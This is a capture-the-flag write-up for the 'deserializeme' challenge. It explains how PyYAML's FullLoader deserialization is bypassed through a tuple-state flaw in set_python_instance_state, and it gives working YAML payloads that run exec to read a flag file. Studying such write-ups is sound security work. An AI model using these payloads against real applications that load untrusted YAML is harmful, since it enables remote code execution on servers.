deserializeme

In this challenge, we're linked a website as well as its Flask backend. It consists of a single route that loads a YAML file we provide in the request body:

@app.route('/', methods=["POST"])
def pwnme():
    if not re.fullmatch(b"^[\n --/-\]a-}]*$", request.data, flags=re.MULTILINE):
        return "Nice try!", 400
    return yaml.load(request.data)

Before anything else, I first verified that this worked as intended. My template for sending YAML files and receiving the result:

import requests

r = requests.post('https://deserializeme.chal.uiuc.tf/', data=open('payload.yaml').read())
print(r.text) # {"hello":"world","number":9}

Vulnerability

PyYAML is well-known for having unsafe deserialization, mainly because they support all sorts of interaction with Python. I'll reference their documentation throughout the writeup.

However, there are two restrictions to keep in mind. First, yaml.load uses FullLoader by default, which bans the !!python/object/apply tag among other things. This means that we won't be able to call arbitrary functions like eval, although we can still construct class objects with the !!python/object/new tag.

Second, this challenge uses a regex filter, which bans the following characters:

  • Periods
  • Carets
  • Underscores
  • Backticks

This prevents us from accessing objects from other modules, which are specified with the <module>.<name> format. Fortunately, PyYAML will use the builtins module by default if you don't supply a period. I'm not sure if this is in the documentation, but the source code proves it:

def find_python_name(self, name, mark, unsafe=False):
    if not name:
        raise ConstructorError("while constructing a Python object", mark,
                "expected non-empty name appended to the tag", mark)
    if '.' in name:
        module_name, object_name = name.rsplit('.', 1)
    else:
        module_name = 'builtins'
        object_name = name

To summarize, we can construct and reference built-in objects. However, we can't call functions, and our goal will be to execute code arbitrarily.

Exploit

This is the format for specifying class construction, as per the documentation:

!!python/object/new:module.Class
args: [argument, ...]
kwds: {key: value, ...}
state: ...
listitems: [item, ...]
dictitems: [key: value, ...]

Right away, I was interested in the state field. It turns out that PyYAML uses it to add arbitrary attributes to an object after it's constructed! This won't work for most built-in types, since they have read-only attributes. Fortunately, some classes are writeable: Warning, the Error types, etc. Hence the following creates an object where obj.hello == 'world':

!!python/object/new:Warning
state:
  hello: 'world'

Not every attribute can be set, however. PyYAML calls check_state_key on each key value, which matches against a regex. Keys of the form __something__ are banned, which makes some sense. Interestingly, the key extend is also banned. PyYAML justifies this in the source code:

extend is blacklisted because it is used by construct_python_object_apply to add listitems to a newly generate python instance

Let's look at the construct_python_object_apply method for clarification:

if state:
    self.set_python_instance_state(instance, state)
if listitems:
    instance.extend(listitems)
if dictitems:
    for key in dictitems:
        instance[key] = dictitems[key]
return instance

Notice that if there were no blacklist, this payload would give RCE:

!!python/object/new:Warning
state:
  extend: !!python/name:exec
listitems: 'whatever python code we want'

We first set extend to be the built-in exec function, using the !!python/name tag. Now instance.extend is a static method, which PyYAML subsequently calls on listitems - a code string! We've essentially created an object that 'spoofs' a list.

In general, this bug exists whenever code assumes the type of an object we provide. It must then call a method with an argument that we control as well. I spent a lot of time looking for this scenario in the Flask source code, but I ended up finding one in PyYAML - coincidentally the function which sets state. Here's the source:

def set_python_instance_state(self, instance, state, unsafe=False):
    if hasattr(instance, '__setstate__'):
        instance.__setstate__(state)
    else:
        slotstate = {}
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if hasattr(instance, '__dict__'):
            if not unsafe and state:
                for key in state.keys():
                    self.check_state_key(key)
            instance.__dict__.update(state)
        elif state:
            slotstate.update(state)
        for key, value in slotstate.items():
            if not unsafe:
                self.check_state_key(key)
            setattr(instance, key, value)

Notice that slotstate is assumed to be a dictionary. Yet if state is a tuple, the code destructures it into (state, slotstate). Since no other type checks are performed, we have full control over both objects! In particular, this lets us exploit slotstate.update(state).

We want slotstate to be a dummy object where update points to exec. Hence state should be a tuple containing a code string and dummy object, in that order. One final caveat: in order to reach the elif block, our outer class instance cannot have the __dict__ attribute - a read-only type like str works. Here's a payload which prints the flag:

!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
  state:
    update: !!python/name:exec

A few more notes:

  • Since periods are banned, I escaped it in the filename. Remember that it isn't YAML supporting hex escape sequences, but exec.
  • In order to access object attributes and methods without periods, I used getattr.
  • The easiest way to exfiltrate from the server is to make an HTTP request containing the flag. This is left as an exercise to the reader
    Image Not Showing Possible Reasons
    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported
    Learn More →